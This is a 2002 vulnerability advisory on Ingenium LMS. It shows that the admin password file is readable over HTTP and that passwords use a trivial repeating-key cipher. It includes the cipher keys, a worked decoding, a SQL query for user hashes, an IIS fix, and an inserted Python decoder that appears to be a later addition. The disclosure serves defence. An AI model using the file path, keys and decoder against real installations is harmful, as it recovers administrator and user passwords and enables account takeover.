
Ingenium Learning Management Admin Password Vulnerability
17th Oct 2002 [SBWID-5758]
COMMAND

	Ingenium Learning Management Admin Password Vulnerability

SYSTEMS AFFECTED

	Ingenium LMS  v5.1  and  v6.1.  It  is  likely  that  all  versions  are
	vulnerable.  Click2Learn's Aspen LMS has not been tested.

PROBLEM

	Thanks to Brian Enigma [enigma@netninja.com] for the audit :
	

	 http://netninja.com/papers/ingenium/

	

	

	 -----------------------

	 ADMINISTRATOR PASSWORD HASH VISIBILITY

	 -----------------------

	

	Ingenium stores a number of configuration parameters in a Microsoft  SQL
	database. It also must store a few values on the  local  system,  as  it
	needs to know several important values before being able to  access  the
	database--for  instance,  the  location,   login,   and   password   for
	connecting to the database. Basically this is the  database  "bootstrap"
	information. In examining the file more closely (it is  called  [install
	directory]/config/config.txt),  I  also  noted  that  the  application's
	administrator password, as a hashed value, is also stored in this  file.
	Even further inspection of the file location, directory  structure,  and
	IIS installation shows that the file is located in a  folder  under  the
	htdocs web directory! This means that a simple  HTTP  request  can  grab
	the config file!
	

	In most default installations, replacing the "default.asp" file name  in
	the   URL,   when   looking   at   the   Ingenium   home   page,    with
	"config/config.txt" will retrieve the file, including the  administrator
	password hash. This is just plain silly! Most web programmers  with  any
	amount of training or experience know that you need to store  your  data
	out-of-band from the documents/programs. Raw data files  should  not  be
	web accessible.
	

	While this particular vulnerability is a known issue (see  Click2Learn's
	Knowledge Base article Q1254), it is  brushed  off  as  advice  for  the
	paranoid. Personal observation has not shown a single  site  that  hides
	this configuration file. Utilizing this vulnerability leads  us  to  the
	importance of the next one.
	

	

	 -----------------------

	 ADMINISTRATOR PASSWORD HASH DECRYPTION

	 -----------------------

	

	You may or may not already know that the best way to store passwords  in
	a persistent data store is with a one-way hash function. In  fact,  this
	is how all Unix systems work. You cannot reverse out a password  from  a
	password hash without a lot of  brute  force--in  most  cases,  so  much
	number crunching that the process is not worth it.  You  may  also  know
	that one of the worst ways to store passwords (or any data) is with  XOR
	"encryption." Two large enough samples and a minute of  math  will  give
	you a pretty darn good idea of what the "encryption"  key  is.  An  even
	less secure method of encrypting data is with a secret decoder ring.  In
	fact, most newspapers  have  a  "Cryptogram"  section  with  the  Sunday
	comics that lets you solve these as a  diversion  (shameless  self-plug:
	http://sourceforge.net/projects/cryptoslam/).  It  is  called  a  Caesar
	cypher and is made  mildly  more  challenging/annoying  by  varying  the
	offset depending on the position of the letter in the message.
	

	I'll give you three guesses what Ingenium uses to store  passwords,  but
	the first two guesses cannot be  "Caesar  Cypher."  Yes,  Ingenium  uses
	about the same  encryption  as  a  Flash  Gordon  Secret  Decoder  Ring.
	Implementation would have been an exercise left for the reader,  but  it
	was a slow Friday, so  the  Java  source  will  be  supplied  with  this
	advisory. Passwords are not case sensitive--it  would  appear  they  are
	converted to uppercase before being "encrypted." The example  code  will
	only decode letters and numbers, no  special  symbols,  but  the  theory
	still applies.
	

	In this particular cipher implementation, the key is:
	

	9'$%100'%6

	

	This key repeats if the plaintext is  longer  than  ten  characters.  To
	decode a given piece of cyphertext, you simply take  the  hex  value  of
	the  cyphertext  character  and  subtract  the  hex  value  of  the  key
	character in the same position, giving you  the  plaintext  hex  character.
	Note that the number space wraps between 0x20 and  0x7D.  Just  in  case
	you are not following, an example  is  in  order.  Let  us  say,  as  an
	example,    that    the    password    line     in     config.txt     is
	"General\LocalAdmin=|smh|#'hp{9'$%10". The decoding goes something  like
	this:
	

	cypher:       |smh|#'hp{9'$%10

	subtract key: 9'$%100'%69'$%10

	

	You will note that only the first ten characters  are  significant.  The
	rest are nulls in the plaintext, giving  the  cyphertext  character  the
	same value as the key character at that position.  Worked  out  in  hex,
	this becomes:
	

	cipher:       7c 73 6d 68 7c 23 27 68 70 7b

	subtract key: 39 27 24 25 31 30 30 27 25 36

	              -----------------------------

	equals:       43 4c 49 43 4b 51 55 41 4b 45

	in ASCII:     C  L  I  C  K  Q  U  A  K  E

	

	You will notice that the "Q" and "U" wrapped down below 0x20,  and  back
	around to 0x7D. Experimentation also shows that the numeric  digits  are
	somehow offset such that zero (normally 0x30) is mapped to  lowercase  n
	(0x6E). Symbols are also mapped  into  this  area,  but  have  not  been
	completely explored.
	

	

	 -----------------------

	 USER PASSWORD HASH VISIBILITY

	 -----------------------

	

	This issue is not as severe as the administrator password. A  user  will
	need SELECT access in the database  to  utilize  this  vulnerability.  A
	simple SELECT * FROM IWC_USR will give you a list of  logins  and  their
	corresponding password  hashes.  The  password  hash  employs  the  same
	algorithm as above, only  you  will  need  to  remove  the  "$"  at  the
	beginning of the password hash and use a  slightly  different  key  (the
	characters "i0)'0+7/" repeated).
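	The decoding rules from the admin-hash section and the IWC_USR variant (leading "$" stripped, different key) written out as an added Python example; this is not the advisory's Java attachment, and the names `_wrap`, `decode_user_hash` and `encode` are this example's own. It folds the wrap into modular arithmetic over the 94 values 0x20..0x7D, which agrees with the CLICKQUAKE walk-through, and includes the encode direction only to make the advisory's point concrete: the mapping is a bijection, so the stored value is an encoding, not a hash.

```python
WRAP_BOTTOM = 0x20                      # lowest value in the cipher alphabet (space)
WRAP_TOP = 0x7D                         # highest value; arithmetic wraps between these
ALPHABET = WRAP_TOP - WRAP_BOTTOM + 1   # 94 values
DIGIT_BASE = 0x6E                       # observed: plaintext '0' decodes to 0x6E ('n')

ADMIN_KEY = "9'$%100'%6"                # key for General\LocalAdmin in config.txt
USER_KEY = "i0)'0+7/"                   # key for IWC_USR rows, after the leading "$"


def _wrap(v: int) -> int:
    """Fold any value back into 0x20..0x7D (modular form of the wrap the text describes)."""
    return WRAP_BOTTOM + (v - WRAP_BOTTOM) % ALPHABET


def decode(cyphertext: str, key: str = ADMIN_KEY) -> str:
    """Subtract the repeating key from each character, position by position."""
    out = []
    for i, c in enumerate(cyphertext):
        k = ord(key[i % len(key)])
        if ord(c) == k:                 # plaintext null: the key char passes through unchanged
            continue
        v = _wrap(ord(c) - k)           # e.g. 0x23 - 0x30 wraps up to 0x51 'Q'
        if DIGIT_BASE <= v <= DIGIT_BASE + 9:
            out.append(chr(ord("0") + v - DIGIT_BASE))   # digits sit at 0x6E..0x77
        else:
            out.append(chr(v))          # letters; symbol values were not fully explored
    return "".join(out)


def decode_user_hash(hash_from_iwc_usr: str) -> str:
    """Per-user hashes from IWC_USR: drop the leading "$", then use the other key."""
    return decode(hash_from_iwc_usr.removeprefix("$"), USER_KEY)


def encode(plaintext: str, key: str = ADMIN_KEY) -> str:
    """Inverse of decode(): uppercase, add the key, wrap. It exists to show the
    scheme is a bijection (every stored value maps back to exactly one password)."""
    out = []
    for i, p in enumerate(plaintext.upper()):
        # '^' (0x5E) is the one plaintext value that lands on the key char itself,
        # so it is indistinguishable from the null padding on the way back.
        v = DIGIT_BASE + int(p) if p.isdigit() else ord(p)
        out.append(chr(_wrap(v + ord(key[i % len(key)]))))
    return "".join(out)


if __name__ == "__main__":
    sample = "|smh|#'hp{9'$%10"        # the config.txt value from the walk-through above
    print(decode(sample))               # CLICKQUAKE
    print(encode("clickquake") == sample[:10])
```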
	

	[Attachment: IngeniumDecoder.java]

	

SOLUTION

	A good long-term solution would be a software  update  from  Click2Learn
	that moves the files in the "config" directory (and possible others)  to
	a path outside of the web documents. This requires engineering time  and
	QA resources. Also,  this  solution  may  not  apply  to  entities  that
	purchased the Ingenium LMS without a support contract.
	

	A simple and immediate solution would be to block  the  config.txt  file
	from being  downloadable.  Configuring  IIS  to  block  access  to  this
	directory can achieve the desired result. This is a simple operation.  First,
	open the Internet Management  console.  Next  locate  the  "config"  web
	folder. Right-click on it and select "Properties." Uncheck the "Read"  and
	"Index" checkboxes and click "OK."
